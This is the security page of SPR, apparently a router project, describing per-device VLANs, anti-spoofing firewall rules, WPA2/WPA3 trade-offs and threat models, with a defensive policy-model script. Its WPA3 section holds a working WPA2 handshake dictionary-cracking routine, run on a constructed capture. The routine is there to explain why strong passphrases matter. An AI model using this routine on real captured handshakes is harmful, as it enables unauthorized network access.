
Security

Contact Information

Email spr-security [at] supernetworks.org or reach out on the Discord chat.

Security Goals

Router is secure against compromises via the web services, remote uplink, or local network attack surfaces

Practical to use strong passwords for WiFi devices

One compromised device should not be able to impersonate other devices on the network or intercept their network traffic

Devices can only communicate with systems they are explicitly allowed to reach. No spoofing.

Out of Scope for Now

Power and radio side-channel attacks

Physical attacks and physical supply chain attacks


Key Security Features

Multi-PSK & VLANs

SPR places each WiFi device into its own VLAN. The combination of the device's password and its MAC address authenticates it onto its VLAN, which DHCP then addresses. The device does not need to be aware it is in a VLAN, except that DHCP has handed it a /30 "tiny" network, so any communication with other LAN devices is routed through the AP rather than switched at layer 2.

There is no limit to the number of VLANs, and the user does not have to assign devices to VLANs themselves.

No MAC spoofing or other layer 2 network pivoting

Firewall rules bind the authenticated device's MAC address to its interface, which blocks MAC spoofing. Further OS configuration blocks ARP spoofing from interfaces on a VLAN. Packet forwarding between devices is default deny: traffic is allowed only if the device has the LAN policy or shares a group with the destination device.

Group temporal keys (GTKs) are unique per VLAN, so devices cannot bypass the router to communicate with each other directly. TDLS is disabled.

These rules are also enforced with mesh networking, supported today in SPR PLUS over a wired backhaul.

Multicast Limitation

Currently the multicast proxy relays multicast traffic to all devices. A further hardening step is to enforce routing policy for multicast traffic as well.

Upstream LAN Traffic Blocked By Default

Typically, users plug SPR into an existing network, which is referred to here as the upstream LAN. By default, SPR blocks device traffic to upstream private (RFC 1918) address ranges unless the device has the lan_upstream tag enabled. This prevents SPR devices from reaching upstream private addresses.
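To make the forwarding rules from the two sections above concrete, here is a small policy model, added here as an example and not SPR's own firewall code: each device is bound to one VLAN interface, MAC and IP; device-to-device traffic is default deny unless both hold the LAN policy or share a group; RFC 1918 destinations that are not SPR devices are treated as the upstream LAN and need lan_upstream. The device names, MACs, interface names, the SPR LAN range and the "wan" policy for public destinations are constructed for the example, and treating "lan" as a group both sides must hold is this model's assumption.

```python
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network

# Private ranges that count as the "upstream LAN" when SPR sits behind an existing router.
RFC1918 = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
# Constructed: the pool SPR carves per-device /30 subnets out of in this example.
SPR_LAN = ip_network("192.168.2.0/24")


@dataclass
class Device:
    name: str
    mac: str
    ip: str        # address DHCP handed out inside the device's own /30
    iface: str     # the per-device VLAN interface the device authenticated on (names are made up)
    policies: set = field(default_factory=set)  # "lan", "lan_upstream", and an assumed "wan"
    groups: set = field(default_factory=set)    # user-defined groups, e.g. {"iot"}


@dataclass
class Packet:
    in_iface: str
    src_mac: str
    src_ip: str
    dst_ip: str


def forward_verdict(devices: list, pkt: Packet) -> str:
    """Verdict for a packet in the forward path (traffic to the router itself is out of scope)."""
    by_iface = {d.iface: d for d in devices}
    by_ip = {d.ip: d for d in devices}

    # 1. The ingress VLAN interface is bound to exactly one authenticated MAC/IP pair.
    #    A frame on cam's interface carrying alice's MAC or IP is a spoof and is dropped,
    #    so a compromised device cannot borrow another device's identity or policy.
    src = by_iface.get(pkt.in_iface)
    if src is None:
        return "drop: unknown interface"
    if pkt.src_mac.lower() != src.mac.lower() or pkt.src_ip != src.ip:
        return "drop: source MAC/IP does not match authenticated device"

    # 2. Device-to-device traffic is default deny; only the LAN policy or a shared group opens it.
    dst = by_ip.get(pkt.dst_ip)
    if dst is not None:
        if "lan" in src.policies and "lan" in dst.policies:
            return "accept: lan policy"
        shared = src.groups & dst.groups
        if shared:
            return "accept: shared group " + ",".join(sorted(shared))
        return "drop: default deny between devices"

    dst_addr = ip_address(pkt.dst_ip)
    if dst_addr in SPR_LAN:
        return "drop: no such device"

    # 3. Any other private destination is the upstream LAN: blocked unless lan_upstream is set.
    if any(dst_addr in net for net in RFC1918):
        if "lan_upstream" in src.policies:
            return "accept: lan_upstream"
        return "drop: upstream private LAN"

    # 4. Public destinations need the (assumed) wan policy.
    if "wan" in src.policies:
        return "accept: wan"
    return "drop: no wan policy"


# Constructed inventory: each device sits in its own /30 (router at .1, .5, .9, ...).
DEVICES = [
    Device("alice-laptop",   "02:00:00:00:00:01", "192.168.2.2",  "wlan0.1001", {"lan", "wan"}),
    Device("bob-phone",      "02:00:00:00:00:02", "192.168.2.6",  "wlan0.1002", {"lan", "wan"}),
    Device("cam",            "02:00:00:00:00:03", "192.168.2.10", "wlan0.1003", set(), {"iot"}),
    Device("tv",             "02:00:00:00:00:04", "192.168.2.14", "wlan0.1004", {"wan"}, {"iot"}),
    Device("printer-bridge", "02:00:00:00:00:05", "192.168.2.18", "wlan0.1005", {"lan_upstream"}),
]

if __name__ == "__main__":
    cases = [
        Packet("wlan0.1001", "02:00:00:00:00:01", "192.168.2.2", "192.168.2.6"),    # alice -> bob
        Packet("wlan0.1003", "02:00:00:00:00:03", "192.168.2.10", "192.168.2.14"),  # cam -> tv
        Packet("wlan0.1003", "02:00:00:00:00:03", "192.168.2.10", "192.168.2.2"),   # cam -> alice
        Packet("wlan0.1003", "02:00:00:00:00:01", "192.168.2.2", "192.168.2.6"),    # cam spoofing alice
        Packet("wlan0.1001", "02:00:00:00:00:01", "192.168.2.2", "192.168.1.20"),   # alice -> upstream LAN
        Packet("wlan0.1005", "02:00:00:00:00:05", "192.168.2.18", "192.168.1.20"),  # bridge -> upstream LAN
    ]
    for pkt in cases:
        print(f"{pkt.in_iface} {pkt.src_ip} -> {pkt.dst_ip}: {forward_verdict(DEVICES, pkt)}")
```

The spoof case is the one worth noting: the frame from cam's interface is dropped on the source check before any policy is consulted, so even a device that shares a group with its victim gains nothing by forging the victim's MAC.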

WPA3 Support

WPA3 uses the Simultaneous Authentication of Equals (SAE) protocol for authentication. SAE is a password-authenticated key exchange (Dragonfly), so a sniffed handshake cannot be cracked offline the way a WPA2 four-way handshake can: in WPA2 the PMK is simply PBKDF2 of the passphrase and SSID, and every candidate passphrase can be tested against the captured handshake's MIC.

WPA3 also provides Management Frame Protection (MFP, IEEE 802.11w), which is optional for WPA2 but mandatory in WPA3.
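The WPA2 weakness referred to above can be shown end to end. The block below is an added example, not code from SPR: it derives the PMK and KCK exactly as 802.11i does (PBKDF2-HMAC-SHA1 and PRF-512), builds an EAPOL-Key message 2 with its MIC, and then runs the offline dictionary attack a passive sniffer could run. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed for the example; nothing equivalent exists for SAE, because its commit/confirm exchange gives an observer nothing to test candidate passwords against.

```python
import hashlib
import hmac

# 802.11i key derivation for WPA2-Personal. Everything except the passphrase (SSID, both
# MACs, both nonces, the EAPOL frame and its MIC) is visible to a sniffer of the handshake.


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa2_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK are the KCK, the key that authenticates handshake frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


# Offsets inside an EAPOL-Key frame: 802.1X header (4) + descriptor type (1) + key info (2)
# + key length (2) + replay counter (8) puts the nonce at 17; nonce (32) + IV (16) + RSC (8)
# + ID (8) puts the MIC at 81.
NONCE_OFFSET = 17
MIC_OFFSET = 81


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Construct EAPOL-Key message 2 (supplicant -> AP) carrying SNonce and a valid MIC."""
    body = (
        b"\x02"                        # descriptor type: RSN key
        + b"\x01\x0a"                  # key info: MIC set, pairwise, descriptor version 2
        + b"\x00\x10"                  # key length
        + (1).to_bytes(8, "big")       # replay counter
        + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
        + bytes(16)                    # MIC, zero while it is being computed
        + b"\x00\x00"                  # key data length
    )
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(ssid: str, aa: bytes, spa: bytes, anonce: bytes, msg2: bytes, wordlist):
    """Offline dictionary attack: recompute the MIC for each candidate, return the match or None."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + bytes(16) + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = wpa2_kck(wpa2_pmk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


# Constructed "capture": a hypothetical network whose addresses and nonces are made up;
# the passphrase below is the secret the attacker is trying to recover.
SSID = "spr-demo"
AP_MAC = bytes.fromhex("02a1b2c3d4e5")
STA_MAC = bytes.fromhex("02f6e7d8c9ba")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
_SECRET = "sunflower7"  # a weak, dictionary-sized passphrase
MSG2 = build_msg2(SNONCE, wpa2_kck(wpa2_pmk(_SECRET, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE))
WORDLIST = ["password", "letmein1", "sunflower7", "correct horse battery staple"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, MSG2, WORDLIST))
```

The attacker's cost per guess is one PBKDF2 run (4096 SHA-1 iterations) plus four HMACs, which GPU crackers do at millions of guesses per second; the only defence under WPA2 is passphrase entropy, which is why the goals above call for strong per-device passwords even where WPA3 cannot be used.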

Practical Limitations of WPA3

iOS Device QR-Code WPA2 Downgrade

iOS has a long-standing flaw where WPA3 networks joined by scanning a QR code are later saved as WPA2. As a result, SPR supports both WPA2 and WPA3 for devices.

Many devices don't support WPA3 yet, and some still require WPA1.

Since not all devices that join a BSSID support WPA3, SPR runs MFP in mixed (optional) mode, ieee80211w=1 in hostapd, so WPA2-only clients without MFP support can still associate.

Network Visibility

SPR provides DNS logging and traffic monitoring, as well as authentication logs for the APIs.


Threat Actors

Remote Internet Attacker

Anyone on the internet that can send packets to the WAN/Uplink interface

Man In The Middle / Malicious ISP

An attacker with a man in the middle position on the uplink

Supply Chain Attacker

An attacker looking to insert code into the SPR project to compromise routers

Physical Proximity Attacker (Evil Neighbor)

An attacker within radio range of the WiFi

Inside Perimeter Attacker (Evil Guest)

An attacker with physical access inside the network perimeter

Compromised Device Attacker (Implant)

An attacker operating from a compromised device, authenticated on the network

Threat Vectors

Network Flaws

Weak Passphrase / Password Reuse

ARP Spoofing

MAC Spoofing

DHCP MAC Spoofing

VLAN Hopping

Insecure Private Requests from Web Browsers

Software Implementation Flaws

Memory corruption

Command Injection

XSS, CSRF

DNS Cache Poisoning

Response Splitting Attacks

802.11 Flaws

Cryptographic Vulnerabilities

Password Cracking

FragAttacks

MITM

AP Isolation Bypass

Packet-in-packet attacks